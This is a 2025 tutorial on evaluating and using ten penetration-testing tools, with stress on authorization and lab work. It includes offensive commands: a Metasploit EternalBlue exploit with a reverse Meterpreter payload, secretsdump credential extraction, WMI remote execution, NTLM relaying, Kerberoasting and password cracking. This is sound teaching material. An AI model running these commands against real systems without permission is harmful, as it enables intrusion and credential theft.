How to evaluate and safely use cybersecurity tools in 2025
Evaluation criteria that matter in 2025
Ethical hacking is fast-moving, and tool choice impacts speed, depth, and safety of your assessments. In 2025, prioritize tools that are actively maintained, scriptable, and integrate cleanly into CI/CD and cloud-native workflows. Look for projects with transparent release notes, reproducible builds, and robust documentation. Favor tools with machine-readable output (JSON, CSV, JUnit XML) you can parse in pipelines and feed into issue trackers, SIEMs, and dashboards. Assess community health: active issues, PR velocity, and template/rule ecosystems (for scanners like Nuclei). Finally, ensure legal fit: tools should support safe modes, rate limiting, and scoping controls to avoid collateral damage during engagements.
Security programs are also shifting left and into the cloud. That means your go-to set must cover on-prem networks, identity systems, web apps/APIs, and major clouds. Evaluate how easily a tool runs in containers, supports Linux/macOS/Windows, and scales across a distributed runner fleet. Performance characteristics matter for large attack surfaces: does the tool support parallelism, batching, caching, and resumable runs? Equally important is signal-to-noise: choose tools with tunable heuristics and suppression mechanisms so output turns into prioritized findings rather than alert fatigue.
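For example, if your pipeline ingests JSON findings, a short jq pass can turn raw output into a deduplicated triage list. A minimal sketch, assuming Nuclei-style JSON fields and an illustrative file name:
# Convert JSON findings into a severity/host/name TSV for an issue tracker
jq -r '[.info.severity, .host, .info.name] | @tsv' nuclei.json | sort -u > triage.tsv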
Finally, ethics and authorization are non-negotiable. Every technique described here is for sanctioned testing under written permission. Use provider- and customer-approved scope definitions, safety guardrails (low-impact payloads, time windows), and immediate stop conditions. Log your commands, hashes, and timestamps for auditability. When in doubt, ask for explicit scope approval before touching high-risk techniques like NTLM relaying, password cracking, or service exploitation.
Build a safe, authorization-first lab
Before pointing any tool at production, reproduce targets in an isolated lab that mirrors your customer’s tech stack. Start with a virtualization host (or cloud tenancy) and build four zones: attacker workstation, target network, identity/AD, and internet simulation. Use Infrastructure as Code (IaC) to stand up ephemeral environments so you can reset quickly after destructive tests. Populate realistic datasets (sample users, rotated secrets, small web apps) and seed known weaknesses you can verify as ground truth.
# Example lab layout (ASCII)
# [Attacker] ---- Mgmt VLAN ---- [Jump Box]
#     |                             |
# Test VLAN -------------------- [AD/DC + FileSrv]
#     |                             |
# Web/App Subnet --------------- [Apps + APIs]
#     |
# Cloud Sandbox (AWS/Azure/GCP) --> Shared test accounts
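If you virtualize locally, snapshot-based resets make the ephemeral-environment goal concrete. A minimal sketch using VirtualBox, assuming hypothetical VM names and a snapshot named baseline:
# Reset the target zone to a known-good state after destructive tests
for vm in ad-dc file-srv web-app; do
  VBoxManage controlvm "$vm" poweroff || true   # ignore VMs that are already off
  VBoxManage snapshot "$vm" restore baseline
  VBoxManage startvm "$vm" --type headless
done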
Instrument the lab with logging: Sysmon on Windows, Zeek on the span port, and a minimal SIEM stack (e.g., OpenSearch) to correlate tool actions with defensive telemetry. Add a TLS interception proxy for egress tests and a sinkhole DNS to prevent accidental calls to real domains. Establish an approval checklist: scope, change window, blast radius analysis, rollback plan, and notification contacts. This discipline is what separates professional ethical hackers from opportunistic testing.
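The sinkhole DNS can be as simple as a dnsmasq catch-all. A sketch, assuming a hypothetical lab interface lab0 and a sinkhole address from the TEST-NET range:
# Answer every DNS query with the sinkhole IP so lab tools never reach real domains
cat <<'EOF' > /etc/dnsmasq.d/sinkhole.conf
address=/#/192.0.2.53
interface=lab0
EOF
systemctl restart dnsmasq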
1) Nmap: the foundation of network reconnaissance
What it does and why it matters in 2025
Nmap remains the gold standard for host discovery, port scanning, service/version detection, and lightweight vulnerability probing via the Nmap Scripting Engine (NSE). In 2025, it’s still the fastest way to turn unknown IP space into an actionable service inventory. Hybrid networks haven’t made this obsolete: Nmap identifies internet-exposed services, on-prem east-west exposures, and misconfigured edge devices. The NSE library provides targeted checks (SSL/TLS info, SMB enumeration, HTTP metadata) without the overhead of a full vulnerability scanner. Because it’s scriptable, portable, and respectful of rate limits, Nmap fits both recon phases and continuous monitoring jobs.
Two modern use cases stand out. First, continuous external attack surface management (EASM) pipelines use Nmap as a verification step to confirm target liveness and service banners after subdomain enumeration. Second, secure network segmentation validation: scan known allowlists and choke points during change windows to verify only intended ports are reachable. Nmap’s granular timing options and host grouping make it safe to operate under sensitive maintenance windows, and its structured greppable or XML output feeds downstream parsers and dashboards.
Hands-on workflow, flags, and gotchas
Start wide, then go deep. Begin with host discovery, pivot to TCP SYN scans on alive hosts, then enrich with version detection and NSE scripts scoped to your engagement rules.
# 1) Host discovery (no port scan)
nmap -sn 10.10.0.0/24 -oA discover
# Extract live hosts from the greppable output (-iL expects plain targets, not .gnmap files)
grep "Status: Up" discover.gnmap | awk '{print $2}' > alive.txt
# 2) Fast top-ports scan on discovered hosts
nmap -Pn -T4 --top-ports 1000 -sS -oA top1k -iL alive.txt
# 3) Service/version detection + OS guess
nmap -sS -sV -O -T3 -oA svc_os -iL alive.txt
# 4) Focused NSE scripts (http, ssl, smb as permitted)
# Use --script-help <name> to understand impact first
nmap -p 80,443 --script http-title,http-headers -oA http -iL alive.txt
nmap -p 445 --script smb-enum-shares,smb2-security-mode -oA smb -iL alive.txt
# 5) XML to HTML report (xsltproc honors nmap's embedded stylesheet; ndiff for diffs)
xsltproc -o svc_os.html svc_os.xml
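The segmentation-validation use case described above becomes a one-line diff once you keep baselines. A sketch using ndiff (bundled with Nmap), with illustrative file names:
# Scan only the approved choke-point ports, then diff against the approved baseline
nmap -Pn -p 22,443,3389 -iL chokepoints.txt -oX "seg_$(date +%F).xml"
ndiff seg_baseline.xml "seg_$(date +%F).xml"   # any diff output means an unexpected change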
Gotchas: avoid aggressive timing (-T5) on fragile networks. Treat UDP scans as long-running and targeted; consider -sU on short port lists (e.g., 53, 123, 161). Validate host discovery on cloud targets where ICMP may be blocked (-Pn if needed). Use exclude files to honor scope. Always document scripts used, versions, and timestamps so operations teams can reproduce what you saw.
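To make the UDP and scoping advice concrete, a short targeted run might look like this (file names are illustrative):
# Short UDP port list plus an exclude file to honor scope
nmap -sU -p 53,123,161 --open -iL alive.txt --excludefile out_of_scope.txt -oA udp_short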
2) Wireshark: deep protocol analysis for truth on the wire
What it does and why it matters in 2025
Wireshark is the definitive packet analyzer. For ethical hackers, it’s invaluable when “the app says X, but the wire says Y.” From TLS handshakes to HTTP/2 framing, SMB dialect negotiation, and DNSSEC behavior, Wireshark reveals implementation flaws, misconfigurations, and risky defaults. In 2025, complex microservice mesh traffic and encrypted-by-default stacks make selective decryption and precise filtering essential. Wireshark’s modern display filters, protocol dissectors, and PCAP-NG metadata provide that precision.
It’s not just for forensics; use it proactively to validate findings. Example: a claimed TLS 1.2-only posture might still accept TLS 1.0 on a legacy VIP—Wireshark shows that immediately. API testers can verify H/2 downgrades, header normalization, and JWT leaks. In internal tests, you can confirm NTLM fallback, SMB signing behavior, or Kerberos ticket exchanges. The tool’s extensibility (Lua dissectors, extcap) means you can instrument unique lab setups and data sources without switching tools.
Hands-on workflow: filters, keys, and validation
Capture minimally, filter maximally, and document rigorously. Prefer capture filters to trim data at the source, then refine with display filters for analysis.
# Start capture on a specific interface with BPF filter (CLI tshark example)
tshark -i eth0 -f "tcp port 443 or tcp port 80" -w web.pcapng
# Common display filters (the legacy "ssl" prefix was renamed to "tls" in Wireshark 3.0)
http.request or http.response
tls.handshake
ip.addr == 10.10.0.5 and tcp.port == 445
# Decrypt TLS when you control the client: set SSLKEYLOGFILE and import into Wireshark
export SSLKEYLOGFILE=$HOME/sslkeys.log
# Launch the browser or test client, then in Wireshark:
# Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename
# Follow a flow and export its payload:
# Right-click packet -> Follow -> TCP Stream -> Save As
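To turn the earlier TLS 1.0 example into a repeatable check, you can filter ServerHello messages for legacy versions. A sketch against the capture above (a TLS 1.3 ServerHello carries 0x0303 in this legacy field, so it won't false-positive):
# List servers that negotiated TLS 1.1 or below (0x0302 = TLS 1.1, 0x0301 = TLS 1.0)
tshark -r web.pcapng -Y 'tls.handshake.type == 2 && tls.handshake.version <= 0x0302' \
  -T fields -e ip.src -e tls.handshake.version | sort -u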
Gotchas: don’t indiscriminately capture sensitive production data; use ring buffers and narrow capture filters. Verify that time is synchronized (NTP) across systems to align with app logs. For encrypted protocols you can’t decrypt, focus on metadata: JA3/JA4 fingerprints, SNI, ALPN, and timing. Always secure your PCAPs at rest; they frequently contain secrets and PII and should be handled under your data handling policy.
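For the ring-buffer advice, a disk-bounded capture might look like this (interface, filter, and sizes are examples):
# Rotate across 10 files of ~100 MB each so long captures cannot fill the disk
tshark -i eth0 -f "tcp port 443" -b filesize:100000 -b files:10 -w ring.pcapng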
3) Burp Suite: the web and API testing workbench
What it does and why it matters in 2025
Burp Suite remains the most widely adopted interactive workbench for web application and API security testing. Its intercepting proxy, request editors (Repeater/Intruder), crawler, passive/active scanners (Pro), Collaborator for out-of-band detection, and specialized tooling like DOM Invader make it a one-stop shop for modern web engagements. In 2025, APIs (REST/GraphQL/gRPC), single-page apps, and complex authentication flows require tooling that can capture, replay, fuzz, and script traffic across browsers, mobile devices, and automation harnesses.
Burp’s extension ecosystem (BApp Store) fills gaps with add-ons for JWT analysis, GraphQL introspection, and HTTP/2/3 behaviors. With proper scoping, rate limiting, and collaboration features, Burp scales from single tester sessions to team projects. For regulated environments, use Burp’s logging and project files to produce reproducible evidence, and combine with source-of-truth traffic captures from proxies or service meshes for cross-validation.
Hands-on workflow: from intercept to evidence
Set up, scope, then iterate. Start by configuring Burp as a proxy, import target scope, and map the application before active testing.
# 1) Proxy setup
# - Configure browser to use 127.0.0.1:8080 (FoxyProxy recommended)
# - Install Burp CA cert in the browser for TLS interception
# 2) Define scope precisely (Target -> Scope)
# Include only authorized domains/paths to avoid collateral traffic
# 3) Crawl and passively analyze
# Use Burp's crawler or manual browsing to build the Site map
# 4) Reproduce issues reliably
# Send requests to Repeater to tweak headers/payloads
# Use Intruder for parameter fuzzing with throttling
# 5) Out-of-band checks (if allowed)
# Collaborator for SSRF/blind XSS callbacks; log all interactions
# 6) Export evidence
# Save Request/Response pairs, project file, and issue descriptions
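Before browsing, it helps to confirm the proxy chain actually intercepts TLS. A quick sketch, assuming you exported Burp's CA certificate to an illustrative path:
# A successful TLS response here proves interception and trust are wired correctly
curl -x http://127.0.0.1:8080 --cacert ~/burp-ca.pem -sv https://target.example.com/ -o /dev/null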
Gotchas: throttle active scanning to respect rate limits and SLAs, especially on APIs and third-party integrations. Handle tokens safely; avoid storing long-lived credentials in project files. For SPAs, use Burp's embedded Chromium browser (where DOM Invader runs) to catch DOM-based vulnerabilities that server-side scans miss. Keep a clean proxy history and exclude out-of-scope domains (such as CDNs) to reduce noise and risk.
4) Metasploit Framework: modular exploitation and post-exploitation
What it does and why it matters in 2025
Metasploit Framework provides a vast library of auxiliary scanners, exploits, payloads, and post-exploitation modules in a consistent, scriptable interface. For ethical hackers, it accelerates proof-of-concept validation: once a vulnerability is suspected (e.g., SMB signing off + known CVE), a curated module can safely check or exploit under controlled conditions. In 2025, its value is in repeatability and auditability: workspaces, loot management, and logs enable precise, evidentiary testing that you can replay in a lab or during remediation validation.
While zero-days and vendor-specific exploits move fast, Metasploit’s structured modules remain a baseline for common misconfigurations and N-day vulnerabilities. Its integration with external scanners and wordlists, plus support for staged and stageless payloads, keeps it relevant. Use it to validate exposure chains end-to-end: discovery, exploitation, session management, and minimal post-exploitation required to prove impact without causing damage.
Hands-on workflow: a safe, reproducible run
Use workspaces per engagement, log everything, and favor check-safe modules when available.
# 1) Launch and set workspace
msfconsole -q
workspace -a q1-external
# 2) Search and info
search type:auxiliary smb_version
# smb_version reports SMB dialects and whether message signing is required
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.0.0/24
run
# 3) Validate a known vulnerability (check method if available)
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.0.0/24
run
# 4) Exploit a single authorized host (only with written approval)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.0.5
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.10.0.9
check   # confirm the target is vulnerable before exploiting, where the module supports it
run
# 5) Export loot and logs
loot
sessions -l
Gotchas: keep modules updated and verify references before use; some exploits require exact target builds. Favor “check” modes and auxiliary scanners to minimize risk. Never run wide-impact modules (e.g., broadcast or worm-like behavior) on production networks. Document stop conditions and rollback plans before exploitation.
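Repeatability is easiest with resource scripts. A minimal sketch, with a hypothetical file name and target list, runnable via msfconsole -q -r engagement.rc:
# engagement.rc: replay the same scan during remediation validation
spool q1-external.log
workspace -a q1-external
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS file:targets.txt
run
spool off
exit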
5) BloodHound (+ SharpHound/AzureHound): attacking paths in Active Directory
What it does and why it matters in 2025
BloodHound models Active Directory (AD) and Azure AD relationships as a graph, revealing attack paths such as privilege escalation, lateral movement, and shadow admin exposure. In 2025, identity attacks continue to dominate incident reports, and BloodHound remains the most effective way to make complex trust relationships visible. Its collectors (SharpHound for on-prem AD, AzureHound for Microsoft Entra ID/Azure AD) gather edges like group membership, session data, ACLs, and role assignments that create real-world opportunities for escalation—even when traditional vulnerability scans are clean.
Use BloodHound to answer: “What is the shortest path from a compromised workstation user to Domain Admin?” or “Which Azure app registrations have permissions enabling tenant-wide data exposure?” The graph context is actionable for defenders too: you can remove edges (permissions, groups) that form dangerous paths. For ethical hackers, it provides clear, defensible remediation items that map directly to identity controls.
Hands-on workflow: collection to path proofs
Collect minimally, analyze precisely, and demonstrate impact with the least intrusive steps.
# 1) On a domain-joined host, collect AD data (authorized account)
SharpHound.exe -c All --zipfilename collect.zip
# Or PowerShell module variant with scoped collection
# Invoke-BloodHound -CollectionMethod ACL,Group,Session -OutputDirectory .
# 2) For Azure AD (Microsoft Entra ID); auth flags vary by AzureHound version, check --help
azurehound list --tenant "tenant.onmicrosoft.com" -u "user@tenant" -p "$AZURE_PASS" -o azurehound.json
# 3) Ingest and query
# Launch BloodHound (Community Edition) UI and import zip
# Run queries like:
# - Shortest paths to Domain Admins
# - Find computers where domain users have local admin
# - Kerberoastable users
# Example path (ASCII)
[WS-User] --(Local Admin)--> [Server01]
     |                           |
(RDP Allowed)               (Admin To)
     v                           v
[HelpdeskGroup] -----------> [BackupAdmins] --(WriteDACL)--> [Domain Admins]
Gotchas: session collection can be noisy; narrow to specific subnets or OUs when possible. Handle data exports securely—they often contain sensitive relationships and names. Always get explicit approval before demonstrating lateral movement. Use read-only credentials, and avoid techniques that alter directory state (e.g., writing SPNs) unless the scope explicitly permits.
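The OU-scoping advice above maps directly to collector flags. A sketch, assuming a SharpHound build that supports --searchbase (verify against your version's --help):
# Collect only session and group data beneath one OU to cut noise
SharpHound.exe -c Session,Group --searchbase "OU=Workstations,DC=corp,DC=example" --zipfilename scoped.zip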
6) Impacket: Swiss-army toolkit for Windows protocols
What it does and why it matters in 2025
Impacket is a Python toolkit with utilities for working with Windows network protocols (SMB, MSRPC, Kerberos, LDAP). It’s ubiquitous in internal assessments because it enables authenticated and relay-based techniques to validate real risks: password reuse, missing SMB signing, Kerberos misconfigurations, and unsafe delegation. In 2025, it remains the de facto standard for precise protocol interactions during identity-centric testing, with tools like secretsdump.py, psexec.py, wmiexec.py, smbclient.py, and ntlmrelayx.py.
Used responsibly, Impacket demonstrates impact with minimal footprint. For example, secretsdump.py reads from the registry to extract local SAM hashes or, with DCSync privileges, domain secrets; wmiexec.py provides command execution over WMI without writing a persistent service. ntlmrelayx.py validates whether SMB/HTTP relay is possible and whether signing and protections like EPA/Channel Binding are enforced.
Hands-on workflow: authenticated checks and safe relays
Favor authenticated validation first. Only perform relay tests when scope permits and after confirming signing settings.
# 1) List shares interactively (authenticated preferred); check signing with nmap's smb2-security-mode
smbclient.py DOMAIN/user:Passw0rd@10.10.0.15
# at the prompt: "shares" to enumerate, then "exit"
# 2) Extract local hashes from exported registry hives (authorized copies of SAM/SYSTEM)
secretsdump.py -sam sam.save -system system.save LOCAL
# Remote against a target where you hold admin rights
secretsdump.py DOMAIN/user:Passw0rd@10.10.0.42
# 3) Remote command execution without service install (WMI)
wmiexec.py DOMAIN/user:Passw0rd@10.10.0.42 "whoami && hostname"
# 4) Validate NTLM relay possibility (lab-only unless explicit approval)
# Typically paired with a capture (e.g., via network poisoning) and a relay to SMB/LDAP
ntlmrelayx.py -t ldap://10.10.0.10 -smb2support --no-http-server
# NTLM relay data flow (ASCII)
Victim --NTLMv2--> Attacker (relay) --NTLMv2--> Target LDAP/SMB
   ^                                                  |
   +--------------------- Response -------------------+
Gotchas: relays can have side effects if you write changes in LDAP or install services—prefer “check-only” or read-only operations to prove risk. Strictly adhere to authorization, and avoid poisoning techniques on production networks without explicit windows and monitoring. Log all commands, hashes, and results; securely delete sensitive data after reporting.
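A low-footprint example of the Kerberos checks mentioned earlier is enumerating Kerberoastable SPN accounts with Impacket; requesting service tickets touches the KDC but changes no directory state:
# List SPN accounts and save ticket hashes for offline analysis (only if cracking is in scope)
GetUserSPNs.py DOMAIN/user:Passw0rd -dc-ip 10.10.0.10 -request -outputfile kerberoast.txt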
7) Hashcat: GPU-accelerated password cracking and auditing
What it does and why it matters in 2025
Hashcat is the industry-standard GPU-accelerated password cracker used for credential strength assessments and password policy validation. In 2025, password spraying and credential stuffing remain common attacker techniques, making proactive password audits essential. Hashcat supports a wide range of hash types (Windows NTLM, modern KDFs, WPA-EAPOL/PMKID) and efficient attack modes (dictionary, rules, masks, hybrid, combinator). For ethical hackers, Hashcat provides quantifiable metrics: time-to-crack estimates, recovered rates, and insights that drive policy changes (length requirements, blocklists, MFA prioritization).
Because password cracking handles sensitive material, it demands strict handling: explicit authorization, offline-only cracking against hashes you are permitted to use, secure storage for wordlists and results, and immediate disposal post-engagement. Integrate Hashcat output with reporting to show business impact: for example, percent of service accounts with passwords cracked under one day on commodity GPUs.
Hands-on workflow: efficient, responsible audits
Start with targeted wordlists and rules aligned to the organization’s context (brand words, seasonal patterns), then escalate to masks and hybrids if needed.
# 1) Identify hash mode (e.g., NTLM is -m 1000). Verify before running.
# See: hashcat --example-hashes | less
# 2) Basic dictionary attack with rules
hashcat -m 1000 hashes.txt rockyou.txt -r rules/best64.rule -O --status
# 3) Mask attack for policy-aligned patterns (e.g., 8-char with capital+digits)
hashcat -m 1000 hashes.txt -a 3 '?u?l?l?l?l?l?d?d' --increment --status
# 4) Resumable sessions and potfile management
hashcat --session audit_q1 -m 1000 hashes.txt rockyou.txt -r rules/best64.rule
hashcat --session audit_q1 --restore
# 5) Report generation: cracked vs total
hashcat -m 1000 hashes.txt --show > cracked.txt
cut -d: -f1 cracked.txt | sort -u | wc -l
Gotchas: never attempt online brute force; only test against hashes or lab-authorized endpoints in scope. Avoid over-optimizing rules that explode the keyspace without benefit; use statistics from previous cracks to tune. Respect GPU thermals and power limits when running long jobs. Hashcat's potfile stores cleartext passwords; protect it and purge it according to your data retention policy.
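One way to honor the potfile warning is to keep cracked material engagement-local and destroy it on schedule; a sketch with illustrative file names:
# Isolate cracked output per engagement, then securely delete it after reporting
hashcat -m 1000 hashes.txt rockyou.txt --potfile-path ./audit_q1.pot
shred -u ./audit_q1.pot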
8) OWASP Amass: attack surface and asset discovery
What it does and why it matters in 2025
OWASP Amass is a comprehensive framework for DNS-based asset discovery and external attack surface mapping. In 2025, organizations operate sprawling multi-cloud, multi-domain estates; asset inventory gaps are still a leading root cause of exposures. Amass aggregates passive sources, performs active enumeration (bruteforce, permutations), resolves DNS, and correlates IPs and ASN data to map reachable surface area. It’s scriptable, supports configuration of API keys for data sources, and outputs machine-readable graphs.
Amass excels as the first stage of EASM workflows: enumerate subdomains, filter for resolvable records, enrich with HTTP probing, and hand off to scanners like Nuclei. Its graph outputs (Graphviz, JSON) help stakeholders visualize ownership and risky overlaps across brands and third parties. Because it can be aggressive if misconfigured, it’s important to tune sources and wordlists and limit brute force on fragile or third-party infrastructure.
Hands-on workflow: enumerate, resolve, verify
Build a layered enumeration: passive first, then focused active steps. Always respect scope by listing authorized domains and excluding third-party platforms when required.
# 1) Passive enumeration
amass enum -passive -d example.com -o passive.txt
# 2) Active enumeration with wordlist and permutations (tune rate)
amass enum -active -brute -d example.com -o active.txt -w wordlists/subs.txt
# 3) Resolve and deduplicate (dnsx, from ProjectDiscovery, handles the resolution step)
sort -u passive.txt active.txt > subs.txt
dnsx -l subs.txt -r resolvers.txt -o resolved.txt
# 4) Visualize graph (optional; -d3 writes an interactive HTML visualization)
amass viz -d3 -dir . -d example.com
# 5) Hand-off to HTTP probing and scanners
httpx -silent -l resolved.txt -threads 50 -o live_hosts.txt
# External discovery pipeline (ASCII)
[Amass Passive] --> [Amass Active] --> [Resolve] --> [HTTP Probe] --> [Scan]
Gotchas: respect data-source API terms and rate limits, and avoid hammering DNS providers. Configure API keys for high-quality passive sources to improve coverage. Carefully manage permutations; unbounded mutations create noise and trip rate limits. Store evidence (raw lists, resolvers, timestamps) to support reproducibility.
9) ScoutSuite: multi-cloud security posture assessment
What it does and why it matters in 2025
ScoutSuite is an open-source multi-cloud security auditing tool that inspects cloud configuration against best practices across AWS, Azure, and GCP. For ethical hackers, ScoutSuite provides breadth: a quick, read-only view of identity, network, storage, and logging settings in a tenant or account. In 2025, with cloud being the dominant hosting platform, you need a reliable way to identify misconfigurations like overly permissive IAM policies, public S3 buckets, exposed VM ports, weak logging, and risky service defaults before simulating exploitation paths.
ScoutSuite runs using cloud-native credentials (profiles, environment variables, or service principals) and produces an interactive HTML report that directs attention to high-risk findings with evidence and remediation guidance. It’s ideal early in an engagement to prioritize manual testing and as a validation step after remediation. Because it’s read-only, it’s safer than exploitation frameworks for initial scoping, and it integrates well with CI pipelines in security reviews.
Hands-on workflow: authenticated, read-only scanning
Prepare provider credentials scoped to read-only. Run targeted scans and export reports you can share with cloud engineers.
# 1) AWS example using a profile
scout aws --profile security-audit --report-dir ./reports/aws_acme
# 2) Azure example reusing an existing "az login" session
# (service-principal auth also works; exact flags vary by version, see scout azure --help)
scout azure --cli --report-dir ./reports/az_acme
# 3) GCP example using a service account key
scout gcp --service-account "$PWD/gcp-audit.json" --project-id <PROJECT_ID> --report-dir ./reports/gcp_acme
# 4) Serve report locally for review
python3 -m http.server -d ./reports/aws_acme 8000
# Cloud audit flow (ASCII)
[Credential (read-only)] --> [ScoutSuite API calls] --> [HTML report]
             |                                              |
             +------> [JSON findings for pipeline] <--------+
Gotchas: ensure credentials are least-privilege and time-bound. Be careful with large organizations: API throttling can lengthen scans; plan windows accordingly. Confirm regional coverage—some services are region-specific. Treat findings as leads: verify true exposure (e.g., is a public bucket actually holding sensitive data?) before prioritizing remediation.
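For the least-privilege, time-bound credential advice, AWS's managed SecurityAudit policy plus short-lived STS tokens is one pattern (the user name is illustrative):
# Grant read-only audit rights, then mint 4-hour credentials for the scan window
aws iam attach-user-policy --user-name scout-audit --policy-arn arn:aws:iam::aws:policy/SecurityAudit
aws sts get-session-token --duration-seconds 14400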
10) Nuclei: fast, templated vulnerability scanning
What it does and why it matters in 2025
Nuclei is a fast, templated scanner that uses YAML-based rules to detect misconfigurations and vulnerabilities across HTTP, DNS, TCP, and more. In 2025, its strength is the community-driven template ecosystem and performance: it allows ethical hackers to codify checks as code, reproduce them consistently, and run at scale across large target lists. Unlike black-box scanners that are opaque, Nuclei templates are transparent and auditable, making them suitable for regulated environments and CI pipelines as guardrails.
Nuclei shines in an EASM workflow after enumeration and HTTP probing: feed it live hosts and targeted templates (CVE, misconfig, exposures). Its rate limiting, concurrency controls, and fine-grained matchers reduce false positives when tuned correctly. Because templates are plain text, teams can version-control them, review diffs, and create custom detections for internal patterns.
Hands-on workflow: safe, focused scanning
Start with a curated template subset, run in info or low-impact modes, and gradually increase intensity. Always tag your runs and save raw JSON for evidence.
# 1) Update templates
nuclei -ut
# 2) Run curated CVE and exposure templates against live hosts
nuclei -l live_hosts.txt -tags cve,exposure -severity low,medium -o nuclei.out
# 3) JSON output for pipelines
nuclei -l live_hosts.txt -json -o nuclei.json -rl 100 -c 50
# 4) Custom template example (simplified)
# templates/custom/x-powered-by.yaml
id: tech-x-powered-by
info:
  name: X-Powered-By header detected
  severity: info
requests:
  - method: GET
    path:
      - "{{BaseURL}}/"
    matchers:
      - type: word
        part: header
        words:
          - "X-Powered-By"
# EASM loop (ASCII)
[Amass/Subfinder] -> [Resolve] -> [httpx] -> [Nuclei] -> [Manual review]
Gotchas: never run the entire template corpus blindly; you risk false positives and noisy findings. Tag and filter templates based on asset types and business context. Tune rate limits (-rl) and concurrency (-c) to avoid overwhelming targets. Store versions of templates used in your report to make results reproducible during remediation.
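As a CI guardrail, a run can gate the pipeline on high-severity hits; a sketch with illustrative file names:
# Fail the build when any high/critical finding is produced
nuclei -l live_hosts.txt -tags cve -severity high,critical -json -o findings.json
if [ -s findings.json ]; then
  echo "Blocking findings detected; see findings.json" >&2
  exit 1
fi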
Putting it together: a repeatable ethical hacking workflow
End-to-end playbook you can automate
Combining the tools above yields a robust, repeatable pipeline. A typical external assessment starts with Amass enumeration, resolution, and HTTP probing. Nmap verifies service banners and non-HTTP ports. Nuclei runs curated template packs to surface likely exposures. Burp Suite focuses on the highest-value apps and APIs with manual testing and targeted fuzzing. Internally, Wireshark validates network behaviors; Impacket, BloodHound, and Hashcat address identity paths and password hygiene. ScoutSuite audits cloud configuration to close misconfigurations before exploitation is even necessary.
# Example automation scaffold (bash)
set -euo pipefail
DOMAIN=example.com
OUT=out_$(date +%F)
mkdir -p "$OUT"
amass enum -passive -d "$DOMAIN" -o "$OUT/passive.txt"
amass enum -active -brute -d "$DOMAIN" -o "$OUT/active.txt" -w wordlists/subs.txt
sort -u "$OUT/passive.txt" "$OUT/active.txt" > "$OUT/subs.txt"
dnsx -l "$OUT/subs.txt" -r resolvers.txt -o "$OUT/resolved.txt"
httpx -silent -l "$OUT/resolved.txt" -o "$OUT/live.txt"
# nmap takes hostnames/IPs, not URLs, so feed it the resolved list rather than httpx output
nmap -Pn -T4 --top-ports 1000 -sS -iL "$OUT/resolved.txt" -oX "$OUT/nmap.xml"
nuclei -l "$OUT/live.txt" -tags cve,exposure -json -o "$OUT/nuclei.json"
# Manual steps: Burp Suite deep testing on top apps from live.txt
# Internal/lab: Wireshark validation, Impacket checks, BloodHound collection
# Cloud: ScoutSuite per provider and share report
Critical practices: maintain target lists and tool versions in version control. Use containers for tool execution where possible to keep environments consistent. Capture raw outputs (PCAPs, XML, JSON) and derive human-readable reports from them to preserve evidence. Always obtain and document written authorization, scope, and data handling procedures before running anything against a customer’s environment.
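Containerized execution keeps tool versions consistent across runners; a sketch using public images (tags are examples, pin digests in practice):
# Run scanners from pinned images so every runner uses identical tool versions
docker run --rm -v "$PWD:/work" projectdiscovery/nuclei:latest -l /work/live.txt -o /work/nuclei.out
docker run --rm -v "$PWD:/work" instrumentisto/nmap -Pn --top-ports 1000 -iL /work/resolved.txt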